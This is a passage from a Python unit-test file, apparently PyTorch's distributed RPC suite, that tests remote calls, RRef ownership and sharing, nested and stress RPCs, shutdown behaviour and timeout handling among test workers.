ret = rpc.rpc_sync(worker_name(dst_rank), no_result, args=(10,))
@dist_init
def test_py_raise_in_user_func(self):
with captured_output() as (_, err):
# This barrier prevents a race condition where the main thread has
# not entered the context manager when the remote function runs.
initialize_pg(self.file_init_method, self.rank, self.world_size)
dist.barrier()
n = self.rank + 1
dst_rank = n % self.world_size
fut = rpc.rpc_async(worker_name(dst_rank), raise_func)
with self.assertRaisesRegex(ValueError, expected_err):
fut.wait()
            # This barrier prevents a race condition where the main thread exits
            # the context manager before the remote function has run.
dist.barrier()
# Validate that trainers log errors when running functions.
stderr_lines = err.getvalue()
self.assertTrue(expected_err in stderr_lines)
@dist_init
def test_py_raise_in_user_func_escaped_str(self):
n = self.rank + 1
dst_rank = n % self.world_size
fut = rpc.rpc_async(worker_name(dst_rank), raise_func_escape)
try:
fut.wait()
except ValueError as e:
msg = str(e)
            # Ensure newlines are unescaped to provide a better repr of the error.
self.assertEqual(msg, msg.encode("utf-8").decode("unicode_escape"))
else:
self.assertTrue(False, "expected raise_func_escape to raise ValueError.")
def _nested_rpc(self, f, expected):
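        # Runs `f` on the next rank, passing this worker's name as the nested RPC
        # destination, and compares the result to `expected`.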
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank),
f,
args=(worker_name(self.rank),),
)
self.assertEqual(ret, expected)
@dist_init
def test_nested_rpc(self):
self._nested_rpc(nested_rpc, torch.ones(2, 2) + 1)
@dist_init
def test_nested_rpc_sparse(self):
self._nested_rpc(nested_rpc_sparse, build_sparse_tensor() * 2)
def _stress_test_rpc(self, f, repeat=1000, args=()):
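        # Fires `repeat` async RPCs running `f` on the next rank, waits for all of them,
        # checks that each returns 0, and prints the elapsed time.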
n = self.rank + 1
dst_rank = n % self.world_size
futs = []
tik = time.time()
for _ in range(repeat):
fut = rpc.rpc_async(worker_name(dst_rank), f, args=args)
futs.append(fut)
for val in torch.futures.wait_all(futs):
self.assertEqual(val, 0)
tok = time.time()
print(
"Rank {} finished testing {} times in {} seconds.".format(
self.rank, repeat, tok - tik
)
)
@dist_init
def test_stress_light_rpc(self):
self._stress_test_rpc(light_rpc)
@dist_init
def test_stress_heavy_rpc(self):
self._stress_test_rpc(heavy_rpc, repeat=20, args=(torch.ones(100, 100),))
@dist_init
def test_stress_heavy_rpc_sparse(self):
self._stress_test_rpc(heavy_rpc_sparse, repeat=20, args=(build_sparse_tensor(),))
@dist_init
def test_stress_heavy_rpc_torchscript(self):
self._stress_test_rpc(heavy_rpc_torchscript, repeat=20, args=(torch.ones(100, 100),))
def _builtin_remote_ret(self, x, y, expected):
n = self.rank + 1
dst_rank = n % self.world_size
rref = rpc.remote(
worker_name(dst_rank),
torch.add,
args=(x, y),
)
self.assertEqual(rref.to_here(), expected)
@dist_init
def test_builtin_remote_ret(self):
self._builtin_remote_ret(
torch.ones(2, 2),
torch.ones(2, 2),
torch.ones(2, 2) * 2
)
@dist_init
def test_builtin_remote_ret_sparse(self):
self._builtin_remote_ret(
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor() * 2
)
def _builtin_remote_self(self, x, y, expected):
rref = rpc.remote(
worker_name(self.rank),
torch.add,
args=(x, y),
)
self.assertEqual(rref.local_value(), expected)
@dist_init
def test_builtin_remote_self(self):
self._builtin_remote_self(
torch.ones(2, 2),
torch.ones(2, 2),
torch.ones(2, 2) * 2
)
@dist_init
def test_builtin_remote_self_sparse(self):
self._builtin_remote_self(
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor() * 2
)
def _test_multi_remote_call(self, fn, sparse, args_fn=lambda x, y: (), kwargs_fn=lambda x, y: {}):
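        # Issues m remote calls whose args/kwargs are produced per iteration by
        # args_fn/kwargs_fn, and verifies each RRef's value against a local call to fn.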
m = 10
n = self.rank + 1
dst_rank = n % self.world_size
rrefs = []
expected = []
for i in range(m):
n = n + i
rrefs.append(
rpc.remote(
worker_name(dst_rank),
fn,
args=args_fn(n, sparse),
kwargs=kwargs_fn(n, sparse),
)
)
expected.append(fn(*args_fn(n, sparse), **kwargs_fn(n, sparse)))
for i in range(m):
self.assertEqual(rrefs[i].to_here(), expected[i])
@staticmethod
def _multi_args_fn(n, sparse=False):
if sparse:
return (build_sparse_tensor(), build_sparse_tensor())
else:
return (torch.ones(n, n), torch.ones(n, n))
@dist_init
def test_multi_builtin_remote_ret(self):
self._test_multi_remote_call(
torch.add, False,
args_fn=RpcTest._multi_args_fn
)
@dist_init
def test_multi_builtin_remote_ret_sparse(self):
self._test_multi_remote_call(
torch.add, True,
args_fn=RpcTest._multi_args_fn
)
@dist_init
def test_py_udf_remote(self):
n = self.rank + 1
dst_rank = n % self.world_size
rref = rpc.remote(
worker_name(dst_rank),
my_function,
kwargs={"a": n, "b": n + 1, "c": n + 2},
)
self.assertEqual(rref.to_here(), my_function(n, n + 1, n + 2))
@staticmethod
def _multi_kwargs_fn(n, sparse=False):
if sparse:
return {
"a": build_sparse_tensor(),
"b": build_sparse_tensor(),
"c": build_sparse_tensor()
}
else:
return {"a": torch.ones(n, n), "b": torch.ones(n, n), "c": torch.ones(n, n)}
@dist_init
def test_multi_py_udf_remote(self):
self._test_multi_remote_call(
my_function,
False,
kwargs_fn=RpcTest._multi_kwargs_fn
)
@dist_init
def test_multi_py_udf_remote_sparse(self):
self._test_multi_remote_call(
my_function,
True,
kwargs_fn=RpcTest._multi_kwargs_fn
)
def _py_rref_args(self, a, b, x, y, expected):
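        # Builds two remote RRefs via torch.add on the destination worker, passes them to
        # my_rref_function remotely, and checks the combined result.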
n = self.rank + 1
dst_rank = n % self.world_size
rref_a = rpc.remote(
worker_name(dst_rank), torch.add, args=(a, b)
)
rref_b = rpc.remote(
worker_name(dst_rank), torch.add, args=(x, y)
)
rref_c = rpc.remote(
worker_name(dst_rank), my_rref_function, args=(rref_a, rref_b)
)
self.assertEqual(rref_c.to_here(), expected)
@dist_init
def test_py_rref_args(self):
self._py_rref_args(
torch.ones(2, 2),
1,
torch.ones(2, 2),
2,
torch.ones(2, 2) * 2 + 3)
@dist_init
def test_py_rref_args_sparse(self):
self._py_rref_args(
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor() * 4
)
def _py_rref_args_user_share(self, a, b, c, x, y, z, expected):
n = self.rank + 1
owner_rank = n % self.world_size
user_rank = (n + 1) % self.world_size
rref_a = rpc.remote(
worker_name(owner_rank), my_function, args=(a, b, c)
)
rref_b = rpc.remote(
worker_name(owner_rank), my_function, args=(x, y, z)
)
rref_c = rpc.remote(
worker_name(user_rank), my_rref_function, args=(rref_a, rref_b)
)
self.assertEqual(rref_c.to_here(), expected)
@dist_init
def test_py_rref_args_user_share(self):
self._py_rref_args_user_share(
torch.ones(2, 2),
1,
2,
torch.ones(2, 2),
3,
4,
torch.ones(2, 2) * 2 + 10
)
@dist_init
def test_py_rref_args_user_share_sparse(self):
self._py_rref_args_user_share(
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor() * 6
)
def _py_rpc_rref_args(self, a, b, c, x, y, z, expected):
n = self.rank + 1
dst_rank = n % self.world_size
rref_a = rpc.remote(
worker_name(dst_rank), my_function, args=(a, b, c)
)
rref_b = rpc.remote(
worker_name(dst_rank), my_function, args=(x, y, z)
)
c = rpc.rpc_sync(
worker_name(dst_rank), my_rref_function, args=(rref_a, rref_b)
)
self.assertEqual(c, expected)
@dist_init
def test_py_rpc_rref_args(self):
self._py_rpc_rref_args(
torch.ones(2, 2),
1,
2,
torch.ones(2, 2),
3,
4,
torch.ones(2, 2) * 2 + 10
)
@dist_init
def test_py_rpc_rref_args_sparse(self):
self._py_rpc_rref_args(
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor(),
build_sparse_tensor() * 6
)
def _nested_remote(self, f, expected):
n = self.rank + 1
dst_rank1 = n % self.world_size
dst_rank2 = (n + 1) % self.world_size
rref = rpc.remote(
worker_name(dst_rank1),
f,
args=(worker_name(dst_rank2),),
)
self.assertEqual(rref.to_here(), expected)
@dist_init
def test_nested_remote(self):
self._nested_remote(
nested_remote,
torch.ones(2, 2) + 3
)
@dist_init
def test_nested_remote_sparse(self):
self._nested_remote(
nested_remote_sparse,
build_sparse_tensor() + build_sparse_tensor()
)
def _nested_rref(self, f, expected1, expected2):
n = self.rank + 1
dst_rank1 = n % self.world_size
dst_rank2 = (n + 1) % self.world_size
rref_of_rrefs = rpc.remote(
worker_name(dst_rank1),
f,
args=(worker_name(dst_rank2),),
)
# Say C has 2 OwnerRRefs.
# B has 2 UserRRefs to those 2 OwnerRRefs, respectively.
# This call is effectively A asking B to share its 2 UserRRefs.
rrefs = rref_of_rrefs.to_here()
self.assertEqual(len(rrefs), 2)
self.assertEqual(rrefs[0].to_here(), expected1)
self.assertEqual(rrefs[1].to_here(), expected2)
@dist_init
def test_nested_rref(self):
self._nested_rref(
nested_rref,
torch.ones(2, 2) + 1,
torch.ones(2, 2) + 2
)
@dist_init
def test_nested_rref_sparse(self):
self._nested_rref(
nested_rref_sparse,
build_sparse_tensor() * 2,
build_sparse_tensor() * 2
)
def _nested_rref_stress(self, f, expected1, expected2):
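        # Stress variant of _nested_rref: creates 20 remote RRef-of-RRefs and checks the
        # two inner RRef values of each.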
n = self.rank + 1
dst_rank1 = n % self.world_size
dst_rank2 = (n + 1) % self.world_size
all_rrefs = []
for _ in range(20):
all_rrefs.append(
rpc.remote(
worker_name(dst_rank1),
f,
args=(worker_name(dst_rank2),),
)
)
for i in range(20):
rref_of_rrefs = all_rrefs[i]
rrefs = rref_of_rrefs.to_here()
self.assertEqual(len(rrefs), 2)
self.assertEqual(rrefs[0].to_here(), expected1)
self.assertEqual(rrefs[1].to_here(), expected2)
@dist_init
def test_nested_rref_stress(self):
self._nested_rref_stress(
nested_rref,
torch.ones(2, 2) + 1,
torch.ones(2, 2) + 2
)
@dist_init
def test_nested_rref_stress_sparse(self):
self._nested_rref_stress(
nested_rref_sparse,
build_sparse_tensor() * 2,
build_sparse_tensor() * 2
)
@dist_init
def test_multi_layer_nested_async_rpc(self):
        # This test will exit right away, but there will be a chain of async
        # RPCs. The termination algorithm should detect those messages properly.
        # Otherwise, some peer could exit early, leaving the others to hit
        # timeout or connection-closed errors.
ttl = 20
n = self.rank + 1
dst_rank = n % self.world_size
multi_layer_nested_async_rpc(dst_rank, self.world_size, ttl)
@dist_init
def test_remote_with_exception(self):
n = self.rank + 1
dst_rank = n % self.world_size
# check ref to other workers
rref = rpc.remote(worker_name(dst_rank), raise_func)
with self.assertRaises(ValueError):
rref.to_here()
# check ref to itself
rref = rpc.remote(worker_name(self.rank), no_result, args=(10,))
with self.assertRaises(TypeError):
rref.to_here()
@dist_init
def test_rpc_return_rref(self):
n = self.rank + 1
dst_rank1 = n % self.world_size
dst_rank2 = (n + 1) % self.world_size
rref = rpc.rpc_sync(
worker_name(dst_rank1),
rpc_return_rref,
args=(worker_name(dst_rank2),),
)
self.assertEqual(rref.to_here(), torch.ones(2, 2) + 1)
@dist_init
def test_rref_forward_chain(self):
ttl = 8
n = self.rank + 1
dst_rank = n % self.world_size
rref = rpc.remote(
worker_name(dst_rank), torch.add, args=(torch.ones(n, n), 1)
)
ret_rref = rref_forward_chain(dst_rank, self.world_size, rref, ttl)
for i in range(ttl):
self.assertEqual(len(ret_rref), 1)
ret_rref = ret_rref[0].to_here()
ret = ret_rref
self.assertEqual(ret, torch.add(torch.ones(n, n), 1))
@dist_init
def test_local_rref_no_fork(self):
local_rref = RRef(35)
self.assertEqual(local_rref.local_value(), 35)
@dist_init
def test_local_value_not_on_owner(self):
        # Ensure that an error is raised if a user tries to call
        # local_value() on a non-owning node.
next_rank = (self.rank + 1) % self.world_size
rref = rpc.remote(
worker_name(next_rank), torch.add, args=(torch.ones(1), torch.ones(1))
)
with self.assertRaisesRegex(
RuntimeError, (
fr"For UserRRef\(rref_id=GloballyUniqueId\(created_on={self.rank}, local_id=0\), "
fr"fork_id=GloballyUniqueId\(created_on={self.rank}, local_id=1\)\), "
r"can't call localValue\(\) on user "
fr"WorkerInfo\(id={self.rank}, name={worker_name(self.rank)}\). "
fr"Call it on owner WorkerInfo\(id={next_rank}, name={worker_name(next_rank)}\)"
)
):
rref.local_value()
@dist_init
def test_return_local_rrefs(self):
n = self.rank + 1
dst_rank = n % self.world_size
rref_list = rpc.rpc_sync(
worker_name(dst_rank), get_rref_list, args=([1, 2, 3],)
)
for rref in rref_list:
rpc.rpc_sync(
rref.owner(),
_call_method_on_rref,
args=(MyClass.increment_value, rref, 10),
)
rets = [
rpc.rpc_sync(
rref.owner(), _call_method_on_rref, args=(MyClass.get_value, rref)
)
for rref in rref_list
]
self.assertEqual(rets, [11, 12, 13])
@dist_init
def _test_rref_type(self, blocking):
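        # Verifies rref._get_type() in blocking and non-blocking modes: the first call
        # launches an RPC to the owner, subsequent calls are served from a cache
        # (non-blocking calls return the same cached future), and the type is also
        # resolved correctly for a user-defined class.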
def launched_rpc(events):
expected_name = f"rpc_{RPCExecMode.ASYNC.value}#_rref_typeof_on_owner"
return any([e.name.startswith(expected_name) for e in events])
dst = worker_name((self.rank + 1) % self.world_size)
rref = rpc.remote(dst, torch.add, args=(torch.ones(2), 1))
with _profile() as p:
t = rref._get_type(blocking=blocking)
if not blocking:
t = t.wait()
self.assertTrue(launched_rpc(p.function_events))
expected_type = type(torch.ones(2))
self.assertEqual(t, expected_type)
futs = []
def verify(fut):
self.assertEqual(fut.value(), expected_type)
with _profile() as p:
for _ in range(10):
t = rref._get_type(blocking=blocking)
if not blocking:
futs.append(t)
t.add_done_callback(verify)
t = t.wait()
self.assertEqual(t, expected_type)
if not blocking:
# Note that cached calls with blocking=False all return the same
# cached original future.
first_fut = futs[0]
for f in futs[1:]:
self.assertTrue(f is first_fut)
# Ensure we never launch another RPC, other than for the very
# first call.
self.assertFalse(launched_rpc(p.function_events))
self.assertEqual(t, type(torch.ones(2)))
rref = rpc.remote(dst, MyClass, args=(0,))
rref_type = rref._get_type(blocking=blocking)
if not blocking:
rref_type = rref_type.wait()
self.assertEqual(rref_type, MyClass)
def test_rref_type_blocking(self):
self._test_rref_type(blocking=True)
def test_rref_type_non_blocking(self):
self._test_rref_type(blocking=False)
@dist_init
def _test_rref_type_with_error(self, blocking):
dst = worker_name((self.rank + 1) % self.world_size)
        # raise_func errors on the owner, so _get_type() should surface the error.
rref = rpc.remote(dst, raise_func)
# Blocking: error raised inline
if blocking:
with self.assertRaisesRegex(ValueError, "Expected error"):
rref._get_type(blocking=blocking)
else:
# Non-blocking: Immediately return future, block on wait
fut = rref._get_type(blocking=blocking)
with self.assertRaisesRegex(ValueError, "Expected error"):
fut.wait()
def test_rref_type_with_error_blocking(self):
self._test_rref_type_with_error(blocking=True)
def test_rref_type_with_error_non_blocking(self):
self._test_rref_type_with_error(blocking=False)
@dist_init
def _test_rref_type_owner(self, blocking):
rref = RRef(torch.ones(2) + 1)
rref_type = rref._get_type(blocking=blocking)
if not blocking:
rref_type = rref_type.wait()
self.assertEqual(rref_type, type(torch.ones(2)))
rref = RRef(MyClass(0))
rref_type = rref._get_type(blocking=blocking)
if not blocking:
rref_type = rref_type.wait()
self.assertEqual(rref_type, MyClass)
def test_rref_type_owner_blocking(self):
self._test_rref_type_owner(blocking=True)
def test_rref_type_owner_non_blocking(self):
self._test_rref_type_owner(blocking=False)
@staticmethod
def _slow_add(x, y):
time.sleep(1)
return x + y
@dist_init
def test_rref_type_slow_init(self):
dst = worker_name((self.rank + 1) % self.world_size)
rref = rpc.remote(dst, RpcTest._slow_add, args=(torch.ones(2), 1))
self.assertEqual(rref._get_type(), type(torch.ones(2)))
@dist_init
def test_owner_equality(self):
a = RRef(40)
b = RRef(50)
other_rank = (self.rank + 1) % self.world_size
other_a = rpc.remote(
worker_name(other_rank), torch.add, args=(torch.ones(1), 1)
)
other_b = rpc.remote(
worker_name(other_rank), torch.add, args=(torch.ones(1), 1)
)
other_a.to_here() # to ensure clean termination
other_b.to_here()
self.assertNotEqual(a.owner(), 23)
self.assertEqual(other_a.owner(), other_b.owner())
self.assertNotEqual(a.owner(), other_a.owner())
self.assertEqual(other_a.owner(), other_a.owner())
self.assertEqual(other_a.owner(), other_b.owner())
self.assertEqual(a.owner(), a.owner())
self.assertEqual(a.owner(), b.owner())
self.assertEqual(a.owner(), rpc.get_worker_info())
x = dict()
x[a.owner()] = a
x[other_a.owner()] = other_a
self.assertEqual(x[a.owner()], a)
self.assertEqual(x[b.owner()], a)
self.assertEqual(x[other_a.owner()], other_a)
self.assertEqual(x[other_b.owner()], other_a)
self.assertEqual(len(x), 2)
@dist_init
def test_pass_local_rrefs(self):
n = self.rank + 1
dst_rank = n % self.world_size
dst_worker = worker_name(dst_rank)
rref = RRef(40)
self.assertEqual(
rpc.rpc_sync(dst_worker, add_rref_to_value, args=(rref, 50)), 90
)
self.assertEqual(
rpc.rpc_async(dst_worker, add_rref_to_value, args=(rref, 50)).wait(), 90
)
self.assertEqual(
rpc.remote(dst_worker, add_rref_to_value, args=(rref, 50)).to_here(), 90
)
@dist_init
def test_remote_same_worker(self):
n = self.rank + 1
dst_rank = n % self.world_size
rref_a = rpc.remote(
worker_name(dst_rank), torch.add, args=(torch.ones(n, n), 2)
)
rref_b = rpc.remote(
worker_name(dst_rank), torch.add, args=(torch.ones(n, n), 1)
)
rref_c = rpc.remote(
worker_name(dst_rank), my_rref_function, args=(rref_a, rref_b)
)
self.assertEqual(rref_c.to_here(), torch.ones(n, n) + 4)
@dist_init(setup_rpc=True)
def test_call_method_on_rref(self):
"""
        Tests that it is possible to call an instance method on a remote object
        by using rref.owner() as the destination of the call.
"""
vals = [10, 2, 5, 7]
dst_rank = (self.rank + 1) % self.world_size
dst_worker = worker_name(dst_rank)
# creates a remote object
rref = rpc.remote(dst_worker, MyClass, args=(vals[0],))
# modifies state of the remote object
rpc.rpc_sync(
rref.owner(),
_call_method_on_rref,
args=(MyClass.increment_value, rref, vals[1]),
)
rpc.rpc_async(
rref.owner(),
_call_method_on_rref,
args=(MyClass.increment_value, rref, vals[2]),
).wait()
rpc.remote(
rref.owner(),
_call_method_on_rref,
args=(MyClass.increment_value, rref, vals[3]),
).to_here()
# queries state of the remote object
result = rpc.rpc_sync(
dst_worker, _call_method_on_rref, args=(MyClass.get_value, rref)
)
self.assertEqual(result, sum(vals))
# Notice `rpc.api.shutdown()` accesses
# `_delete_all_user_and_unforked_owner_rrefs` through
# `torch.distributed.rpc.api`, so patching
# `torch.distributed.rpc._delete_all_user_and_unforked_owner_rrefs` will
# not help.
@mock.patch.object(torch.distributed.rpc.api, "_delete_all_user_and_unforked_owner_rrefs")
def _test_rref_leak(self, _mock_delete_all_user_and_unforked_owner_rrefs, ignore_leak):
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
initialize_pg(self.file_init_method, self.rank, self.world_size)
# Wait for all init to complete.
dist.barrier()
rref = rpc.remote(
worker_name((self.rank + 1) % self.world_size),
torch.add,
args=(torch.ones(2, 2), 1),
)
import torch.distributed.rpc.api as api
if ignore_leak:
api._ignore_rref_leak = True
rpc.shutdown(graceful=True)
else:
api._ignore_rref_leak = False
with self.assertRaisesRegex(RuntimeError, "Leaking RRef"):
rpc.shutdown(graceful=True)
@dist_init(setup_rpc=False)
def test_rref_leak(self):
self._test_rref_leak(ignore_leak=False)
@dist_init(setup_rpc=False)
def test_ignore_rref_leak(self):
self._test_rref_leak(ignore_leak=True)
@dist_init
def test_rref_str(self):
rref1 = RRef(self.rank)
id_class = "GloballyUniqueId"
self.assertEqual(
"OwnerRRef({}(created_on={}, local_id=0))".format(id_class, self.rank), rref1.__str__()
)
dst_rank = (self.rank + 1) % self.world_size
rref2 = rpc.remote(
worker_name(dst_rank), torch.add, args=(torch.ones(2, 2), 1)
)
self.assertEqual(
rref2.__str__(),
"UserRRef(RRefId = {0}(created_on={1}, local_id=1), ForkId = {0}(created_on={1}, local_id=2))".format(
id_class, self.rank
),
)
@dist_init
def test_rref_get_future(self):
        # Tests that we can obtain the future corresponding to the creation of
        # the RRef on the remote end.
if self.rank == 0:
# Builtin
rref = rpc.remote(worker_name(1), torch.add, args=(1, 1))
rref.to_here()
fut = rref._get_future()
self.assertIsInstance(fut, torch._C.Future)
# UDF
rref = rpc.remote(worker_name(1), foo_add, args=())
rref.to_here()
fut = rref._get_future()
self.assertIsInstance(fut, torch._C.Future)
# Script
rref = rpc.remote(worker_name(1), my_script_func, args=(torch.tensor(1), ))
rref.to_here()
fut = rref._get_future()
self.assertIsInstance(fut, torch._C.Future)
@dist_init
def test_rref_context_debug_info(self):
        # This test checks local state that is modified by remote workers.
        # This means that we need a barrier before and after every check.
        # The barrier before a check makes sure that all previous state has been
        # cleared globally; the barrier after ensures that no subsequent state
        # change leaks into the current check.
initialize_pg(self.file_init_method, self.rank, self.world_size)
# Check 1: local RRef does not update owners_ map or add a pending user.
#################################################
rref1 = RRef(self.rank)
# don't need a barrier here as local RRef is handled by this thread
info = _rref_context_get_debug_info()
self.assertIn("num_owner_rrefs", info)
self.assertIn("num_pending_users", info)
        # An RRef on a local value is not added to the context until it is shared over RPC.
self.assertEqual(0, int(info["num_owner_rrefs"]))
self.assertEqual(0, int(info["num_pending_users"]))
# barrier after the check 1
dist.barrier()
# Check 2: Sharing RRef as an arg should update owners_ map
###########################################################
dst_rank = (self.rank + 1) % self.world_size
rpc.rpc_sync(worker_name(dst_rank), set_global_rref, args=(rref1,))
# barrier before check 2
wait_until_pending_futures_and_users_flushed()
dist.barrier()
info = _rref_context_get_debug_info()
self.assertIn("num_owner_rrefs", info)
self.assertEqual(1, int(info["num_owner_rrefs"]))
# no pending users since the fork is finished
self.assertEqual(0, int(info["num_pending_users"]))
# barrier after check 2
dist.barrier()
# clear states for check 2
rpc.rpc_sync(worker_name(dst_rank), clear_global_rref)
# Wait for owner rref to be cleared.
while int(info["num_owner_rrefs"]) != 0:
info = _rref_context_get_debug_info()
time.sleep(0.1)
dist.barrier()
# Check 3: rpc.remote call should update owners_ map
####################################################
rref2 = rpc.remote(
worker_name(dst_rank), torch.add, args=(torch.ones(2, 2), 1)
)
rref3 = rpc.remote(
worker_name(dst_rank), torch.add, args=(torch.ones(2, 2), 1)
)
rref2.to_here()
rref3.to_here()
# barrier before check 3
wait_until_pending_futures_and_users_flushed()
dist.barrier()
info = _rref_context_get_debug_info()
self.assertIn("num_owner_rrefs", info)
self.assertEqual(2, int(info["num_owner_rrefs"]))
# no pending users since the fork is finished
self.assertEqual(0, int(info["num_pending_users"]))
# barrier after check 3
dist.barrier()
@dist_init
def test_disable_gil_profiling(self):
        # Test that with rpc.enable_gil_profiling(False) (the default), GIL wait
        # time is not recorded, and that it is recorded once profiling is enabled.
        # GIL profiling should be disabled by default.
dst_rank = (self.rank + 1) % self.world_size
rpc.rpc_sync(
worker_name(dst_rank), torch.add, args=(torch.ones(1), torch.ones(1))
)
info = rpc.api._get_current_rpc_agent().get_debug_info()
self.assertRaises(KeyError, lambda: info["agent.gil_average_wait_time_us"])
rpc.enable_gil_profiling(True)
rpc.rpc_sync(
worker_name(dst_rank), torch.add, args=(torch.ones(1), torch.ones(1))
)
info = rpc.api._get_current_rpc_agent().get_debug_info()
self.assertIn("agent.gil_average_wait_time_us", info)
@dist_init(setup_rpc=False)
def test_local_shutdown(self):
# test that we can start RPC and then immediately locally shutdown
# without sending any messages.
rpc.init_rpc(
name="worker%d" % self.rank,
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
# pass in graceful=False to ensure that we don't wait for other workers.
rpc.shutdown(graceful=False)
@dist_init
def test_debug_info(self):
        # Only test keys in this test case; values should be covered by the
        # individual modules' debug info tests.
import torch.distributed.autograd as dist_autograd
info = _get_debug_info()
rref_info = _rref_context_get_debug_info()
agent_info = rpc.api._get_current_rpc_agent().get_debug_info()
autograd_info = dist_autograd._get_debug_info()
common_keys = rref_info.keys() & agent_info.keys() & autograd_info.keys()
self.assertEqual(0, len(common_keys))
expected = {}
expected.update(rref_info)
expected.update(agent_info)
expected.update(autograd_info)
# NB: Key ordering is only preserved in python 3.6+. So here, we
# manually check keys are equal.
for key in expected.keys():
self.assertIn(key, info.keys())
for key in info.keys():
self.assertIn(key, expected.keys())
@dist_init(setup_rpc=False)
@sandcastle_skip_if(
IS_MACOS,
"Test is flaky on MacOS since libuv error handling is not as robust as TCP",
)
def test_handle_send_exceptions(self):
# test that if a callee node has gone down, we raise an appropriate
# exception instead of just crashing.
rpc.init_rpc(
name="worker%d" % self.rank,
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
rpc._set_rpc_timeout(10)
# This barrier is needed to ensure that some workers do not exit before
# others have been brought up.
initialize_pg(self.file_init_method, self.rank, self.world_size)
dist.barrier()
if self.rank == 1:
dst_rank = (self.rank + 1) % self.world_size
dst_worker = worker_name(dst_rank)
# allow destination worker to exit without joining
error_str = self.get_shutdown_error_regex()
wait_until_node_failure(dst_rank, error_str)
fut = rpc.rpc_async(dst_worker, torch.add, args=(torch.ones(1), 3))
# Shutdown sequence is not very well defined and as a result
# we can see any of the error messages defined in get_shutdown_error_regex.
with self.assertRaisesRegex(RuntimeError, error_str):
fut.wait()
# exit all workers non-gracefully.
rpc.shutdown(graceful=False)
@dist_init
def test_deadlock(self):
# this test is copied from https://github.com/pytorch/pytorch/issues/45089
if self.rank == 1:
dst1 = worker_name((self.rank + 1) % self.world_size)
x = torch.ones(2)
y = torch.ones(2)
rpc.rpc_async(dst1, RpcTest._slow_add, args=(x, y), timeout=15).wait()
dist_initialized = dist.is_initialized()
if not dist_initialized:
dist.init_process_group(
backend="gloo",
init_method=self.file_init_method,
rank=self.rank,
world_size=self.world_size,
)
@dist_init(setup_rpc=False)
def test_local_shutdown_with_rpc(self):
# test that we can start RPC, send RPCs, and then run local shutdown.
rpc.init_rpc(
name="worker%d" % self.rank,
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
n = self.rank + 1
dst_rank = n % self.world_size
rpc.rpc_sync(
worker_name(dst_rank),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n)),
)
# A barrier is needed to ensure that all RPCs are processed.
        # Otherwise, some RPCs can time out since the receiving end
# has terminated.
initialize_pg(self.file_init_method, self.rank, self.world_size)
dist.barrier()
# pass in graceful=False to ensure that we don't wait for other workers.
rpc.shutdown(graceful=False)
@dist_init(setup_rpc=False)
def test_set_and_get_default_rpc_timeout(self):
timeout = 0.5
# A new `RpcBackendOptions` is constructed
# when accessing `self.rpc_backend_options`.
rpc_backend_options = self.rpc_backend_options
rpc_backend_options.rpc_timeout = timeout
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=rpc_backend_options,
)
set_timeout = rpc.get_rpc_timeout()
self.assertEqual(timeout, set_timeout)
rpc.shutdown()
@dist_init
def test_default_timeout_used(self):
"""
Tests that if no timeout is passed into rpc_async and rpc_sync, then the
default timeout is used.
"""
dst_rank = (self.rank + 1) % self.world_size
rpc._set_rpc_timeout(0.001) # 1 ms
        # The futures should time out and be marked with an exception indicating as much.
futs = [
rpc.rpc_async(worker_name(dst_rank), my_sleep_func, args=())
for _ in range(10)
]
expected_error = self.get_timeout_error_regex()
for fut in futs:
with self.assertRaisesRegex(RuntimeError, expected_error):
fut.wait()
# ensure that if a new timeout is set old futures don't time out but new ones do.
rpc._set_rpc_timeout(200) # 200 seconds
        # create a long-running RPC.
fut1 = rpc.rpc_async(worker_name(dst_rank), my_sleep_func, args=(1,))
# now, set a short timeout.
rpc._set_rpc_timeout(0.001)
# fut2 should time out, fut1 should not.
fut2 = rpc.rpc_async(worker_name(dst_rank), my_sleep_func, args=(1,))
with self.assertRaisesRegex(RuntimeError, expected_error):
fut2.wait()
fut1.wait()
# Zero timeout means infinity, so future should run to completion.
rpc._set_rpc_timeout(0)
rpc.rpc_async(worker_name(dst_rank), my_sleep_func, args=()).wait()
# reset to default timeout so shutdown messages can process cleanly.
rpc._set_rpc_timeout(rpc.constants.DEFAULT_RPC_TIMEOUT_SEC)
@dist_init
def test_rpc_timeouts(self):
# TODO: enable timeouts for rpc.remote/RRef (https://github.com/pytorch/pytorch/issues/33803)
dst_rank = (self.rank + 1) % self.world_size
dst_worker = worker_name(dst_rank)
timeout = 0.1 # 100 ms
expected_error = self.get_timeout_error_regex()
# Test async UDF
fut = rpc.rpc_async(dst_worker, my_sleep_func, args=(1,), timeout=timeout)
with self.assertRaisesRegex(RuntimeError, expected_error):
fut.wait()
        # Ensure the RPC runs to completion when no timeout is passed and the
        # default RPC timeout is used.
rpc.rpc_async(dst_worker, my_sleep_func, args=(1,)).wait()
# Test sync UDF
with self.assertRaisesRegex(RuntimeError, expected_error):
rpc.rpc_sync(dst_worker, my_sleep_func, args=(1,), timeout=timeout)
        # Ensure the RPC runs to completion when no timeout is passed and the
        # default RPC timeout is used.
rpc.rpc_sync(dst_worker, my_sleep_func, args=(1,))
# If we set a default timeout for RPCs, it should be respected, though
# still overridden if we pass in a different timeout to the APIs.
rpc._set_rpc_timeout(0.001)
fut = rpc.rpc_async(dst_worker, my_sleep_func, args=(1,))
with self.assertRaisesRegex(RuntimeError, expected_error):
fut.wait()
with self.assertRaisesRegex(RuntimeError, expected_error):
rpc.rpc_sync(dst_worker, my_sleep_func, args=(1,))
